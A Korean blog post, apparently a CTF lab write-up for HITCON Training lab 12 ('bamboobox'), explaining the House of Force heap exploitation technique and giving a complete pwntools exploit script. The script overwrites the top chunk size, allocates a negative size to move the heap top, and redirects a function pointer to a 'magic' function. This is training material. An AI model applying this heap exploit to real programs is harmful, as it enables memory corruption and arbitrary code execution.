티스토리 뷰
hitcon training 의 lab 12번이다.
house of force기법을 이용해서 magic함수를 실행시켜 플래그를 얻는문제이다.
House of foce
topchunk의 size영역을 덮어쓰고 원하는 영역에다가 할당을 받을 수 있는 기법이다.
condition
- topchunk의 size 가 변조가능해야한다.
- 할당된 chunk의 값을 바꿀 수 있어야한다.
- 할당되는 heap의 크기를 제어할 수 있어야한다.
exploit scenario
1. topchunk를 32bit, 64bit의 각각 최댓값(0xffff~)으로 덮는다.
2. top chunk의 주소와 할당받고 싶은 위치의 주소의 차를 구한다.
3. 그 차만큼 할당해준다.
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
|
from pwn import *
context.log_level = 'debug'
p = process('./bamboobox')
e = ELF('./bamboobox')
l = e.libc
magic = 0x0000000000400d49
def add(size, content):
p.recvuntil(':')
p.send('2')
p.recvuntil(':')
p.send(str(size))
p.recvuntil(':')
p.send(str(content))
def remove(idx):
p.recvuntil(":")
p.send('4')
p.recvuntil(':')
p.send(str(idx))
def edit(idx, size, content):
p.recvuntil(':')
p.send('3')
p.recvuntil(':')
p.send(str(idx))
p.recvuntil(':')
p.send(str(size))
p.recvuntil(':')
p.send(str(content))
def show(idx):
p.recvuntil(':')
p.send('1')
p.recvuntil(':')
p.send(str(idx))
p.recvuntil(': ')
add(0x100, 'a') # 0
edit(0, 0x110, "B"*0x108+p64(0xffffffffffffffff)) # 0
add(-0x140, 'a') # 1
add(0x10, p64(magic)*2)
p.send('5')
print p.recv()
|
magic() 으로 돌리는것보다 NULL byte덮어서 libc leak따고 쉘 함 따봐야겠당.
- malloc 분석이 거의끝나간다.@!!~@
댓글